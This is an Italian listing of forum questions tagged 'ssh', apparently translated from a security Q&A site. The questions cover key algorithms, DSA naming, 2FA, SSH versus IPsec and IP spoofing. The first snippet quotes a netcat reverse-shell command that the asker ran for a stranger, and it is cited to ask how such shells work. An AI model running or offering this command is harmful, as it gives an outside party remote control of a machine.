Domande con tag 'ssh'

domande con tag
3
risposte

come si comporta la shell inversa?

Qualcuno mi stava aiutando con un problema sul mio server vagabondo. È stato in grado di accedere alla shell tramite (l'ho eseguito per lui, con il suo IP e la sua porta): nc <ip> -e /bin/bash <port> Non l'ho mai incontrato prim...
posta 11.02.2016 - 23:01
2
risposte

comprensione del passaggio "Offerta pubblica chiave RSA" durante l'inizializzazione della connessione SSH

Durante l'inizializzazione della connessione SSHv2, è presente il seguente messaggio di debug: debug1: Offering RSA public key: /home/user/.ssh/id_rsa Ho corretto che in realtà nessuna chiave pubblica è stata inviata al server? Inoltre, /...
posta 28.02.2017 - 15:56
2
risposte

Non è sicuro aprire la porta di MySQL su internet?

Il consenso su questo La domanda Server Fault sembra essere che la porta di apertura 3306 per MySQL è più pericolosa dell'utilizzo di un tunnel SSH per accedere a MySQL. Penserei che con credenziali forti potresti mantenere MySQL sicuro, sp...
posta 24.07.2014 - 22:55
3
risposte

Quale algoritmo chiave host è meglio usare per SSH?

Quando ti connetti per la prima volta a un server SSH che non è contenuto nel tuo file known_hosts , il tuo client SSH mostra l'impronta digitale della chiave pubblica che il server ha fornito. Ho trovato da questa domanda qui che come cli...
posta 25.07.2016 - 23:25
2
risposte

Autenticazione a due fattori con autenticazione chiave ssh e yubikey?

OpenSSH non invocherà PAM a tutti se chiave pubblica (RSA) l'autenticazione è configurata e il client presenta una chiave valida. Pertanto, se si utilizza l'autenticazione basata su chiave, non è possibile applicare facilmente 2FA. Una soluzi...
posta 12.04.2013 - 18:32
7
risposte

Perché una chiave privata crittografata può essere forzata bruta?

Quando si usano le chiavi SSH per autenticarsi su un server per l'accesso remoto, perché è possibile escogitare la chiave vera e quindi la passphrase da una chiave privata crittografata, senza verificare ogni ipotesi della passphrase sul server...
posta 11.04.2011 - 18:14
2
risposte

È sicuro trasferire una chiave pubblica RSA via email?

Ho configurato il mio server VPS'ssh per accettare solo l'identificazione basata su chiave: ho disabilitato la connessione basata su password. Di conseguenza mi sto connettendo da casa con una chiave RSA generata prima della disabilitazione d...
posta 24.02.2013 - 22:37
3
risposte

Qual è la differenza tra SSH e IPsec?

Sembra che ci sia una crittografia simile in entrambi. Entrambi utilizzano asimmetrici (RSA, curve ellittiche, ecc.) Per lo scambio iniziale di chiavi, quindi passano a un protocollo simmetrico (AES, Blowfish, ecc.). Mi chiedo se qualcuno qui po...
posta 13.11.2013 - 23:02
2
risposte

Perché le chiavi DSA vengono chiamate chiavi DSS quando vengono utilizzate con SSH?

Quando genero una chiave DSA con ssh-keygen -t dsa , la chiave pubblica risultante inizierà con ssh-dss . Come mai? Perché non ssh-dsa ?     
posta 15.02.2014 - 04:48
2
risposte

Lo spoofing IP è rilevante per TCP? È rilevante per TLS o SSH?

Ho letto il TCP Connection Establishment su Wikipedia In breve i pacchetti da avviare sono SYN , con un (forse) codice casuale numero A dal client. SYN-ACK , che risponde, con A + 1 e (si spera) casuale numero di sequenza B...
posta 14.03.2012 - 21:40